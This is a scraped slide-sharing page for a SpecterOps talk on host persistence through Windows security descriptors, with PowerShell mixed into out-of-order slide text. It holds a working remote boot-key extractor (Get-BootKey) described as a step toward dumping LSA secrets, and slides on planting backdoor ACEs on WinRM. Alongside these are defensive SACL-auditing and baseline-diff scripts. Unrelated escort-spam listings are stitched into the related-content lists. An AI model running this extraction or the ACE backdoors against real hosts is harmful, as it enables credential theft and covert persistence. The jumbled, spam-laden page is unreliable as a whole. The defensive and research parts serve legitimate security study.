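function Get-RegistryKeyClass {
    param([Parameter(Mandatory)][Microsoft.Win32.RegistryKey]$Key)
    $buf = New-Object System.Text.StringBuilder 256
    [uint32]$len = $buf.Capacity
    $z = [IntPtr]::Zero
    $rc = [Win32.Advapi32]::RegQueryInfoKey($Key.Handle, $buf, [ref]$len, $z, $z, $z, $z, $z, $z, $z, $z, $z)
    if ($rc -ne 0) { throw "RegQueryInfoKey on '$($Key.Name)' failed, Win32 error $rc" }
    $buf.ToString(0, $len)
}

function Get-WinregTrustees {
    # Who the winreg key lets through: this DACL, not the target key's, is what
    # RegConnectRegistry checks first.
    (Get-Acl -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg').Access |
        Select-Object IdentityReference, RegistryRights, AccessControlType, IsInherited
}

function Get-BootKey {
    param([Parameter(Mandatory)][string]$ComputerName)
    $hklm = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $ComputerName)
    try {
        $hex = ''
        foreach ($sub in 'JD', 'Skew1', 'GBG', 'Data') {
            $k = $hklm.OpenSubKey("SYSTEM\CurrentControlSet\Control\Lsa\$sub")
            if ($null -eq $k) { throw "cannot open Lsa\$sub (no access or key missing)" }
            try { $hex += Get-RegistryKeyClass -Key $k } finally { $k.Close() }
        }
    } finally { $hklm.Close() }
    if ($hex.Length -ne 32) { throw "unexpected class data: $hex" }
    # 16 bytes, stored scrambled; un-permute with the fixed table every boot-key extractor uses.
    $scrambled = [byte[]](0..15 | ForEach-Object { [Convert]::ToByte($hex.Substring($_ * 2, 2), 16) })
    $perm = 0x8, 0x5, 0x4, 0x2, 0xB, 0x9, 0xD, 0x3, 0x0, 0x6, 0x1, 0xC, 0xE, 0xA, 0xF, 0x7
    , [byte[]]($perm | ForEach-Object { $scrambled[$_] })
}

# Usage:
Get-WinregTrustees
# $bootKey = Get-BootKey -ComputerName 'WS01'          # placeholder host
# ($bootKey | ForEach-Object { $_.ToString('x2') }) -join ''
```

Nothing in Get-BootKey needs administrative rights on the target; the only gate is the winreg key DACL, which is exactly what the ACE on the previous slide opens. The steps that follow (reading PolEKList and the $MACHINE.ACC secret) need read access inside the SECURITY hive, which is why the slide also takes ownership of that hive.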
55
Remote Registry
56
Remote Registry
Demo
https://youtu.be/pOHO3hdTKyw
6.
Defense
All is not lost!
57
SACLs:
the other ACL
× A system access control list
× “Enables administrators to log attempts to
access a secured object”
× Not used as extensively as they should
be!
58
Defensive
Enumeration
× More research is needed- you can’t
defend against what you aren’t aware of!
× Defensive PowerUp++ ? Operational
test framework for the detection of
backdoor scenarios?
× Integration into BloodHound?
59
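Two concrete defensive moves for the SACL and "defensive enumeration" slides, as an added example that is not the authors' code: put audit entries on the registry keys the earlier slides target so that DACL, ownership and value changes produce Security log events, and keep an SDDL baseline of the host's securable objects to diff later (the gold-image case from the "Big Point(s)" slide). Key paths are the ones from the slides; the file path and everything else is assumed. Run elevated: SeSecurityPrivilege is needed to read and write SACLs.

```powershell
# Added example, not the authors' code: audit ACEs on the keys the talk targets, plus a
# SDDL baseline/diff for SCM, services, WinRM and those keys.

$WatchedKeys = @(
    'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'  # remote registry gate
    'HKLM:\SOFTWARE\Microsoft\Ole'                                     # DCOM machine-wide limits
    'HKLM:\SYSTEM\CurrentControlSet\Control\Print'                     # print server SD
)

function Add-TamperAudit {
    # Audit successful permission/ownership/value changes by anyone (S-1-1-0). With the
    # "Audit Registry" subcategory enabled (auditpol /set /subcategory:"Registry" /success:enable)
    # a DACL change then logs event 4670, which carries the old and new SDDL.
    param([Parameter(Mandatory)][string]$Path)
    $acl  = Get-Acl -Path $Path -Audit
    $rule = New-Object System.Security.AccessControl.RegistryAuditRule(
        (New-Object System.Security.Principal.SecurityIdentifier('S-1-1-0')),
        [System.Security.AccessControl.RegistryRights]'ChangePermissions, TakeOwnership, SetValue',
        [System.Security.AccessControl.InheritanceFlags]::ContainerInherit,
        [System.Security.AccessControl.PropagationFlags]::None,
        [System.Security.AccessControl.AuditFlags]::Success)
    $acl.AddAuditRule($rule)
    Set-Acl -Path $Path -AclObject $acl
}

function Get-ScSddl([string]$Name) {
    $out = @(& sc.exe sdshow $Name | Where-Object { $_ -match '\S' })
    if ($LASTEXITCODE -ne 0) { return "<sc.exe error $LASTEXITCODE>" }
    $out[0].Trim()
}

function Get-DescriptorBaseline {
    # Object name -> SDDL for the objects the talk covers.
    $b = [ordered]@{}
    $b['scm'] = Get-ScSddl scmanager
    foreach ($s in Get-Service) { $b["service:$($s.Name)"] = Get-ScSddl $s.Name }
    $b['winrm:RootSDDL'] = (Get-Item -Path WSMan:\localhost\Service\RootSDDL).Value
    foreach ($p in $WatchedKeys) { $b["reg:$p"] = (Get-Acl -Path $p).Sddl }
    $b
}

function Save-DescriptorBaseline([string]$Path) {
    Get-DescriptorBaseline | ConvertTo-Json | Set-Content -Path $Path
}

function Compare-DescriptorBaseline([string]$Path) {
    $old = Get-Content -Path $Path -Raw | ConvertFrom-Json
    $now = Get-DescriptorBaseline
    foreach ($name in $now.Keys) {
        $was = $old.$name
        if ($null -eq $was) {
            [pscustomobject]@{ Object = $name; Change = 'new';      Was = $null; Now = $now[$name] }
        } elseif ($was -ne $now[$name]) {
            [pscustomobject]@{ Object = $name; Change = 'modified'; Was = $was;  Now = $now[$name] }
        }
    }
}

# Usage:
foreach ($k in $WatchedKeys) { Add-TamperAudit -Path $k }
# Save-DescriptorBaseline -Path C:\baseline\sd.json      # on the gold image / at first boot (path assumed)
# Compare-DescriptorBaseline -Path C:\baseline\sd.json   # later, or from a scheduled task
```

The audit rule is deliberately on WRITE_DAC/WRITE_OWNER rather than on reads: the backdoor is planted once, so the change event is the signal, and a baseline diff catches the case where the change predates the audit policy (or was baked into the image).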
Takeaways
× The host-control graph is *MUCH* bigger than
“is member of local admin group”
× What is the real attack surface of a Windows
host?
× Many “forgotten” or unexplored RPC/DCOM
servers
× Many other securable objects we haven’t looked
at
60
61
Takeaways &
Future Work
× Implications of other securable objects
× Real-time analysis
× Enumeration of objects visible only to the
kernel
× Chaining host + AD security descriptor
abuse
62
Thanks!
Any questions?
@tifkin_ / @enigma0x3 / @harmj0y
https://specterops.io/
63

Contenu connexe

Tendances

Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 

Tendances (20)

Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 
Troopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can You
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation  Red Pill2017How fun of privilege escalation  Red Pill2017
How fun of privilege escalation Red Pill2017
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the Torch
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
 
BloodHound: Attack Graphs Practically Applied to Active Directory
BloodHound: Attack Graphs Practically Applied to Active DirectoryBloodHound: Attack Graphs Practically Applied to Active Directory
BloodHound: Attack Graphs Practically Applied to Active Directory
 

Similaire à An ACE in the Hole - Stealthy Host Persistence via Security Descriptors

Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
Giuseppe Paterno'
 
3.Secure Design Principles And Process
3.Secure Design Principles And Process3.Secure Design Principles And Process
3.Secure Design Principles And Process
phanleson
 
Sheng defense
Sheng defenseSheng defense
Sheng defense
kalyan_bu
 
7 latest-dot-net-interview-questions
7  latest-dot-net-interview-questions7  latest-dot-net-interview-questions
7 latest-dot-net-interview-questions
sadiqkhanpathan
 

Similaire à An ACE in the Hole - Stealthy Host Persistence via Security Descriptors (20)

Building an EmPyre with Python
Building an EmPyre with PythonBuilding an EmPyre with Python
Building an EmPyre with Python
 
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
XPDS16:  XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...XPDS16:  XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
 
Automate threat detections and avoid false positives
  Automate threat detections and avoid false positives  Automate threat detections and avoid false positives
Automate threat detections and avoid false positives
 
Automatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivosAutomatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivos
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivos
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivos
 
Automatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifsAutomatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifs
 
Automate threat detections and avoid false positives
Automate threat detections and avoid false positivesAutomate threat detections and avoid false positives
Automate threat detections and avoid false positives
 
Automatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivosAutomatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivos
 
Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerTools
 
Up is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Right
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
 
3.Secure Design Principles And Process
3.Secure Design Principles And Process3.Secure Design Principles And Process
3.Secure Design Principles And Process
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the Gap
 
Forensic Memory Analysis of Android's Dalvik Virtual Machine
Forensic Memory Analysis of Android's Dalvik Virtual MachineForensic Memory Analysis of Android's Dalvik Virtual Machine
Forensic Memory Analysis of Android's Dalvik Virtual Machine
 
Sheng defense
Sheng defenseSheng defense
Sheng defense
 
dtrace_topics_intro.pdf
dtrace_topics_intro.pdfdtrace_topics_intro.pdf
dtrace_topics_intro.pdf
 
7 latest-dot-net-interview-questions
7  latest-dot-net-interview-questions7  latest-dot-net-interview-questions
7 latest-dot-net-interview-questions
 
Permission enforcement s in android new (1)
Permission   enforcement s  in android new (1)Permission   enforcement s  in android new (1)
Permission enforcement s in android new (1)
 
Database security and privacy
Database security and privacyDatabase security and privacy
Database security and privacy
 

Plus de Will Schroeder

Plus de Will Schroeder (14)

Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdf
 
Certified Pre-Owned
Certified Pre-OwnedCertified Pre-Owned
Certified Pre-Owned
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to Compromise
 
A Year in the Empire
A Year in the EmpireA Year in the Empire
A Year in the Empire
 
Trusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conTrusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44con
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
Trusts You Might Have Missed
Trusts You Might Have MissedTrusts You Might Have Missed
Trusts You Might Have Missed
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
 

Dernier

Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
ellan12
 
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Chandigarh Call girls 9053900678 Call girls in Chandigarh
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
@Chandigarh #call #Girls 9053900678 @Call #Girls in @Punjab 9053900678
 
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Sheetaleventcompany
 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
imonikaupta
 

Dernier (20)

Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune  (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune  (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
 
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
 
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
 
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...

An ACE in the Hole - Stealthy Host Persistence via Security Descriptors

  • 16. Where are these descriptors?
      × Found in the registry, the file system, in the kernel, ntds.dit....
      × Really depends on the type of object
      × Finding what objects are securable, much less exactly where their descriptors are located, isn’t as easy as you’d think...
  • 17. From DACLs to SACLs
      × Access Control List (ACL) is basically shorthand for the DACL/SACL superset
      × An object’s Discretionary Access Control List (DACL) and System Access Control List (SACL) are ordered collections of Access Control Entries (ACEs)
      × DACL - What principals/trustees have what rights over the object
      × SACL - Specifies how to audit access to the object
  • 19. More on DACLs
      × Null DACL != no DACL
      × Inheritance… can be a >_<
      × General interpretation (order in which ACEs are evaluated):
          × Explicit Deny
          × Explicit Allow
          × Inherited Deny
          × Inherited Allow
  • 21. Our Research Approach
      Objects accessible from user-mode, with a focus on ones usable for persistence/lateral movement
      1. Discover securable objects
      2. Offline and online security descriptor enumeration
      3. Analyze access mask
          a. What object-specific rights are there (if any)?
          b. What rights permit persistence/lateral movement?
      4. Operational weaponization and detection
  • 22. 1. Discovering Securable Objects
      × Windows documentation lists about 20-30 securable objects*
      × We’ve identified 70+! (There’s *many* more)
      × Microsoft Protocol Specifications
          × Very useful for RPC servers
      × Find-RegistrySecurityDescriptors.ps1
      * https://msdn.microsoft.com/en-us/library/windows/desktop/aa379557(v=vs.85).aspx
  • 24. 2. Online vs Offline Security Descriptors
      × Where do objects get their security descriptor?
          × Offline - Security descriptor derived from registry, file, ntds.dit, etc.
          × Online - Security descriptor is in memory
      Our approach to enumeration:
      × Locally as an unprivileged user
      × Locally as a privileged user
      × Remotely as an unprivileged user
      × Remotely as a privileged user
  • 25. Existing Tooling
      × Use existing tools
          × Accesschk.exe
          × WindowsDACLEnumProject
          × Google’s sandbox analysis tools
          × NtObjectManager woot woot!
          × BloodHound
      × Most do not distinguish between online/offline security descriptors
          × Implication: How do you know if an object has been modified after creation?
  • 26. Enumeration Caveats
      × “Online” vs offline security descriptors
      × Necessary token privileges
      × Some objects are “invisible” to user-mode enumeration
          × Kernel private namespaces
      × Does an object with no name have a security descriptor?
          × https://googleprojectzero.blogspot.co.uk/2014/10/did-man-with-no-name-feel-insecure.html
  • 27. 3. Access Mask Analysis - Taking back what’s yours ;)
  • 28. Deriving Access Mask Meaning
      × MSDN Documentation
      × Technical Specifications
      × Reversing
      × Trial and error ¯_(ツ)_/¯
  • 29. Generic Object Takeover Primitives
      × Attacker is owner (implies WRITE_DAC)
      × Attacker has WRITE_DAC/WRITE_OWNER
      × Attacker has STANDARD_RIGHTS_ALL
      × Attacker has GENERIC_ALL*
      × Object has NULL security descriptor (implies Everyone has GENERIC_ALL)
      * Depends on how the object maps the generic right to standard/object-specific rights. Usually this includes WRITE_DAC/WRITE_OWNER, but doesn’t have to
  • 30. Object-specific Takeover Primitives
      × Each securable object can define its own rights
      × Example: Process Rights
          × PROCESS_CREATE_PROCESS
          × PROCESS_CREATE_THREAD
          × PROCESS_SUSPEND_RESUME
          × PROCESS_QUERY_INFORMATION
          × PROCESS_TERMINATE
      × The specific object and its rights determine its offensive usefulness (priv esc, lateral movement, persistence, etc.)
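As an added example (not from the slides or the authors' tooling), a PowerShell function that parses any SDDL string with .NET's RawSecurityDescriptor and reports the ACEs matching the generic takeover primitives on slide 29; the sample SDDL and the S-1-5-21 domain SID in it are constructed for the demo.

```powershell
# Generic takeover primitives from slide 29 as access-mask bits (winnt.h values),
# ordered broadest first so that each ACE is reported once.
$TakeoverRights = [ordered]@{
    GENERIC_ALL         = 0x10000000
    STANDARD_RIGHTS_ALL = 0x001F0000
    WRITE_OWNER         = 0x00080000
    WRITE_DAC           = 0x00040000
}

function Find-TakeoverAce {
    param([Parameter(Mandatory)][string]$Sddl, [string]$ObjectName = 'object')

    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)

    # The owner always holds implicit WRITE_DAC, whatever the DACL says.
    if ($sd.Owner) {
        [pscustomobject]@{ Object = $ObjectName; Trustee = $sd.Owner.Value; Right = 'Owner (implies WRITE_DAC)'; Inherited = $false }
    }

    # A NULL DACL means no access check at all: Everyone effectively has GENERIC_ALL.
    if ($null -eq $sd.DiscretionaryAcl) {
        [pscustomobject]@{ Object = $ObjectName; Trustee = 'S-1-1-0'; Right = 'NULL DACL (implies GENERIC_ALL)'; Inherited = $false }
        return
    }

    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only allow ACEs can grant a primitive; deny ACEs are skipped.
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        foreach ($name in $TakeoverRights.Keys) {
            $bits = $TakeoverRights[$name]
            if (($ace.AccessMask -band $bits) -eq $bits) {
                [pscustomobject]@{
                    Object    = $ObjectName
                    Trustee   = $ace.SecurityIdentifier.Value
                    Right     = $name
                    Inherited = (($ace.AceFlags -band [System.Security.AccessControl.AceFlags]::Inherited) -ne 0)
                }
                break
            }
        }
    }
}

# Constructed sample: a WinRM-style descriptor (owner NETWORK SERVICE, group Administrators)
# with one extra GENERIC_ALL ACE for a made-up domain SID, the pattern slide 36 describes.
$sample = 'O:NSG:BAD:P(A;;GA;;;BA)(A;;GA;;;IU)(A;;GA;;;S-1-5-21-1111-2222-3333-1105)'
Find-TakeoverAce -Sddl $sample -ObjectName 'WinRM:microsoft.powershell' | Format-Table -AutoSize
```

Feed it the SDDL of any object (Get-PSSessionConfiguration, Get-Acl, a registry value) and every row whose trustee is not an expected group is a candidate backdoor ACE.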
  • 32. Service Control Manager RPC Server
      × “RPC server that enables service configuration and control of service programs.” - MS-SCMR
      × Applicable Securable Objects
          × Service Control Manager Server
          × Windows Services
  • 33. SCM Server Applicable Rights
      SC_MANAGER_CONNECT            Permits connecting to service
      SC_MANAGER_CREATE_SERVICE     Ability to add a new service
      SC_MANAGER_ENUMERATE_SERVICE  List out services
      By default, unauthenticated users can enumerate the security descriptor of the SCM Server!
  • 35. WinRM/WinRS
      × Windows Remote Management/Windows Remote Shell
      × Provides the ability to remotely interface with a host
          × Think PowerShell Remoting
      × Create backdoored ACE and apply it to either the WinRM or WinRS DACL
          × Or both!!
      × Defined user (via SID) will be able to remotely interact with the host without admin privs
  • 36. WinRM/WinRS
      × Security Descriptor can be accessed by pulling the SecurityDescriptorSDDL property of Get-PSSessionConfiguration
      × Build the new DACL via DiscretionaryAcl.AddAccess() of Security.AccessControl.CommonSecurityDescriptor
